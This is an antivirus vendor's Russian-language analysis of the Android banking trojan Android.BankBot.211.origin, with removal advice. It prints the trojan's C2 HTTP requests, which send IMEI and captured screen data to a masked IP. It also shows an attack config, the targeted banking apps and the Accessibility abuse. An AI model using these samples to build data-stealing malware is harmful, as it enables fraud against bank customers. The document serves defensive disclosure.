Защити созданное

Другие наши ресурсы

  • free.drweb.ru — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.ru — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.ru/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

+ Добавить в библиотеку

Моя библиотека

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами

Профиль

Профиль

Android.BankBot.211.origin

Добавлен в вирусную базу Dr.Web:2017-07-20
Описание добавлено:2017-07-19

SHA1:

1fac76cff16887f695f557d849650cf10bcb1adb

Вредоносная программа, заражающая мобильные устройства под управлением ОС Android. Представляет собой банковского троянца, который крадет конфиденциальную информацию и выполняет команды злоумышленников. Android.BankBot.211.origin распространяется под видом безобидных приложений.

После установки и запуска Android.BankBot.211.origin в бесконечном цикле пытается получить доступ к режиму специальных возможностей (Accessibility Service), блокируя работу устройства окном с соответствующим запросом.

#drweb #drweb #drweb

После того как пользователь вынужденно соглашается предоставить троянцу необходимые права, Android.BankBot.211.origin добавляется в список администраторов мобильного устройства, назначает себя менеджером СМС по умолчанию и получает доступ к функциям захвата изображения с экрана (для этого используется класс MediaProjection). Для каждого из указанных действий необходимо согласие пользователя, однако после получения доступа к специальным возможностям вредоносная программа делает это автоматически, самостоятельно нажимая на кнопки подтверждения.

#drweb #drweb #drweb

Если владелец устройства попытается убрать троянца из списка администраторов, Android.BankBot.211.origin автоматически нажимает кнопку «Отмена». В остальных случаях он нажимает кнопку «Назад», используя метод performGlobalAction.

После успешного заражения устройства троянец уведомляет об этом управляющий сервер, отправляя запрос вида:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=reg&imei=86**********554&phone=&op=********&version=5.1%2C3.10.65-svn944&prefix=experience
Затем он ожидает от сервера команд:
POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=poll&imei=86**********554

Троянец может выполнять следующие команды:

  • number_1/prefix_1 – отправить СМС c текстом, который указан в параметре prefix_1, на номер из параметра number_1;
  • call_log – загрузить на сервер информацию об установленных приложениях, список контактов и сведения о телефонных вызовах;
  • sms_history – передать на сервер СМС-сообщения, хранящиеся в памяти устройства;
  • url – открыть заданную ссылку;
  • server – изменить адрес управляющего сервера;
  • intercept – добавить в таблицу reservas параметры phones и полученные значения телефонных номеров;
  • server_poll – добавить в таблицу reservas параметры interval и полученные значения.

Помимо этого Android.BankBot.211.origin перехватывает и отправляет на сервер информацию обо всех входящих сообщениях.

Троянец с определенной периодичностью соединяется с управляющим сервером, используя адрес http://217.***.***.92/jack.zip. Архив, который расположен по этой ссылке, содержит обычный текстовый файл. Android.BankBot.211.origin может отправлять POST-запрос вида:

POST http://217.***.***.92/jack.zip HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1; [модель устройства] Build/LMY47D)
Host: 217.***.***.92
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
_AUTH=86**********554

В ответ вредоносная программа получает конфигурационный файл, зашифрованный алгоритмом AES. В нем указаны параметры для атаки на приложения, установленные на устройстве. Файл содержит названия целевых программ, ссылку для загрузки параметров фишинговых форм, а также тип выполняемого действия. Например:

config 
[
{
"name" : "lock_av",
"type" : "lock",
"link" : "no_link",
"apps" : ["com.kms.free", "com.drweb", "screenmirroring.agillaapps.com.screenmirroring", "com.huawei.android.mirrorshare", "com.antivirus", "com.eset.ems2.gp"],
"s_flow" : 1
}, {
"name" : "google_play",
"type" : "window",
"link" : "http://217.***.***.92/link/GooglePlay2/index.html",
"apps" : ["com.google.android.finsky.activities", "com.google.android.music", "com.android.vending"],
"s_flow" : 2
}, {
"name" : "Akbank",
"type" : "fullscreen",
"link" : "http://217.***.***.92/link/Akbank/index.html",
"apps" : ["com.akbank.android.apps.akbank_direkt", "com.akbank.softotp"],
"s_flow" : 2
}
]

где:

  • lock – атака на антивирусные программы и другое ПО, которое может помешать работе троянца (при запуске таких приложений Android.BankBot.211.origin автоматически нажимает кнопку «Назад»);
  • window – показ фишингового окна настроек платежного сервиса, в котором запрашивается информация о банковской карте;
  • fullscreen – показ фишингового окна ввода логина и пароля при запуске приложений для работы с мобильным банкингом и платежными системами.

Троянец показывает фишинговые формы ввода при запуске следующих приложений:

  • com.akbank.android.apps.akbank_direkt – Akbank Direkt;
  • com.akbank.softotp – Akbank Direkt Şifreci;
  • com.finansbank.mobile.cepsube – QNB Finansbank Cep Şubesi;
  • com.garanti.cepsubesi – Garanti Mobile Banking;
  • com.garanti.cepbank – Garanti CepBank;
  • biz.mobinex.android.apps.cep_sifrematik – Garanti Cep Şifrematik;
  • com.pozitron.iscep – İşCep;
  • com.ykb.android – Yapı Kredi Mobile;
  • com.ziraat.ziraatmobil – Ziraat Mobil;
  • com.dbs.sg.dbsmbanking – DBS digibank SG;
  • com.dbs.sg.posbmbanking – POSB digibank SG;
  • com.dbs.dbspaylah – DBS PayLah!;
  • com.dbshk – DBS mBanking Hong Kong;
  • com.dbs.businessclass – DBS BusinessClass;
  • com.dbs.quickcredit.sg – DBS Quick Credit;
  • de.comdirect.android – comdirect mobile App;
  • de.commerzbanking.mobil – Commerzbank Banking App;
  • de.consorsbank – Consorsbank;
  • com.db.mm.deutschebank – Meine Bank;
  • de.dkb.portalapp – DKB-Banking;
  • com.ing.diba.mbbr2 – ING-DiBa Banking + Brokerage;
  • de.postbank.finanzassistent – Postbank Finanzassistent;
  • mobile.santander.de – Santander MobileBanking;
  • com.starfinanz.smob.android – Sparkasse;
  • de.fiducia.smartphone.android.banking.vr – VR-Banking;
  • pl.mbank – mBank PL;
  • eu.eleader.mobilebanking.pekao – Bank Pekao;
  • pl.pkobp.iko – IKO;
  • com.comarch.mobile – Alior Mobile;
  • com.getingroup.mobilebanking – Getin Mobile;
  • pl.ing.ingmobile – INGMobile;
  • pl.ing.mojeing – Moje ING mobile;
  • org.banksa.bank – BankSA Mobile Banking;
  • com.ifs.banking.fiid3767 – BANKWEST OF KANSAS;
  • com.commbank.netbank – CommBank;
  • com.cba.android.netbank – CommBank app for tablet;
  • au.com.ingdirect.android – ING DIRECT Australia Banking;
  • au.com.nab.mobile – NAB;
  • org.stgeorge.bank – St.George Mobile Banking;
  • org.banking.tablet.stgeorge – St.George Tablet Banking;
  • org.westpac.bank – Westpac Mobile Banking;
  • fr.creditagricole.androidapp – Ma Banque;
  • fr.axa.monaxa – Mon AXA;
  • fr.banquepopulaire.cyberplus – Banque Populaire;
  • net.bnpparibas.mescomptes – Mes Comptes BNP Paribas;
  • com.boursorama.android.clients – Boursorama Banque;
  • com.caisseepargne.android.mobilebanking – Banque;
  • fr.lcl.android.customerarea – Mes Comptes – LCL pour mobile;
  • mobi.societegenerale.mobile.lappli – L'Appli Société Générale;
  • uk.co.bankofscotland.businessbank – Bank of Scotland Business;
  • com.grppl.android.shell.BOS – Bank of Scotland Mobile Bank;
  • com.barclays – Barclays Mobile Banking;
  • com.grppl.android.shell.halifax – Halifax Mobile Banking app;
  • com.htsu.hsbcpersonalbanking – HSBC Mobile Banking;
  • com.grppl.android.shell.CMBlloydsTSB73 – Lloyds Bank Mobile Banking;
  • com.lloydsbank.businessmobile – Lloyds Bank Business;
  • santander – Santander;
  • com.ifs.banking.fiid4202 – TSBBank Mobile Banking;
  • com.fi6122.godough – TSB Mobile;
  • com.rbs.mobile.android.ubr – Ulster Bank ROI;
  • com.rbs.mobile.android.natwestoffshore – NatWest Offshore;
  • com.rbs.mobile.android.natwest – NatWest;
  • com.rbs.mobile.android.natwestbandc – NatWest Business Banking;
  • com.speedway.mobile – Speedway Fuel & Speedy Rewards;
  • com.paypal.android.p2pmobile – PayPal;
  • com.ebay.mobile – eBay;
  • com.google.android.music – Google Play Music;
  • com.android.vending – Google Play.

Android.BankBot.211.origin мешает работе следующих программ:

  • com.drweb – Dr.Web Security Space;
  • com.kms.free – Kaspersky Mobile Antivirus;
  • screenmirroring.agillaapps.com.screenmirroring – Screen Mirroring Assistant;
  • com.huawei.android.mirrorshare –无线分享;
  • com.antivirus – AVG AntiVirus;
  • com.eset.ems2.gp – ESET32 – ESET Mobile Security & Antivirus.

Пример поддельных форм ввода и фишинговых окон, которые может показывать Android.BankBot.211.origin:

#drweb #drweb #drweb
#drweb #drweb #drweb

Троянец собирает информацию обо всех запускаемых приложениях и действиях, которые пользователь совершает в них. Для этого он отслеживает следующие события AccessibilityEvent:

  • TYPE_VIEW_TEXT_CHANGED;
  • TYPE_VIEW_FOCUSED;
  • TYPE_VIEW_LONG_CLICKED;
  • TYPE_NOTIFICATION_STATE_CHANGED;
  • TYPE_VIEW_SELECTED;
  • TYPE_WINDOW_STATE_CHANGED;
  • TYPE_VIEW_CLICKED.

Это позволяет вредоносной программе отслеживать доступные текстовые поля в программах, такие как элементы меню, а также фиксировать нажатия на кнопки и другие компоненты пользовательского интерфейса. Полученные данные отправляются на управляющий сервер. Пример передаваемой информации:

POST http://217.***.***.92/v83a59w4h/s991802.php HTTP/1.1
Content-Length: 708
Content-Type: application/x-www-form-urlencoded
Host: 217.***.***.92
Connection: Keep-Alive
action=grabbed_data&imei=86**********554&data={"app":"com.sprd.fileexplorer","report":"Grabbed: com.sprd.fileexplorer\nState: TYPE_WINDOW_STATE_CHANGED\nData: [radio] Быстрый просмотр\n[text] Аудио\n[text] Изображения\n[text] Видео\n[text] Документация\n[text] Приложения\n[text] \/storage\/emulated\/0\n[text] Alarms\n[text] Дата:2015-01-01 03:16:44\n[text] Android\n[text] Дата:2015-01-01 03:17:07\n[text] com.kingroot.kinguser\n[text] Дата:2017-07-11 13:27:37\n[text] DCIM\n[text] Дата:2017-07-11 13:27:45\n[text] documents\n[text] Дата:2017-07-07 14:09:51\n[text] Download\n[text] Дата:2017-07-13 12:27:54\n[text] Fonts\n[text] Дата:2017-07-12 18:33:49\n[text] Kingroot\n[text] Дата:2017-07-07 14:34:11"}

Кроме того, Android.BankBot.211.origin отслеживает работу клавиатуры и похищает вводимые пользователем данные. При каждом нажатии клавиатуры троянец делает скриншот и отправляет полученные изображения на управляющий сервер. Это позволяет вредоносной программе украсть в том числе и пароли, которые он успевает сохранить до того, как они будут скрыты. Данные, которые вводятся в видимые поля, дублируются отправкой в POST-запросе.

#drweb #drweb

Троянец препятствует своему удалению и не позволяет отключить доступ к полученным им расширенным функциям. Чтобы избавиться от Android.BankBot.211.origin, необходимо выполнить следующие действия:

  • загрузить зараженное устройство в безопасном режиме;
  • зайти в системные настройки и перейти к списку администраторов;
  • найти троянца в этом списке и отозвать у него соответствующие права (при этом Android.BankBot.211.origin покажет предупреждение о неизбежной потере всех важных данных, которое является ложным);
  • перезагрузить устройство, выполнить его полное сканирование антивирусом и удалить троянца после окончания проверки.

Новость о троянце

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно

На 14 дней

Российский разработчик антивирусов Dr.Web

Опыт разработки с 1992 года

Dr.Web пользуются в 200+ странах мира

Dr.Web в Реестре Отечественного ПО

Поставка антивируса как услуги с 2007 года

Круглосуточная поддержка на русском языке

© «Доктор Веб»
2003 — 2018

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125040, Россия, Москва, 3-я улица Ямского поля, вл.2, корп.12А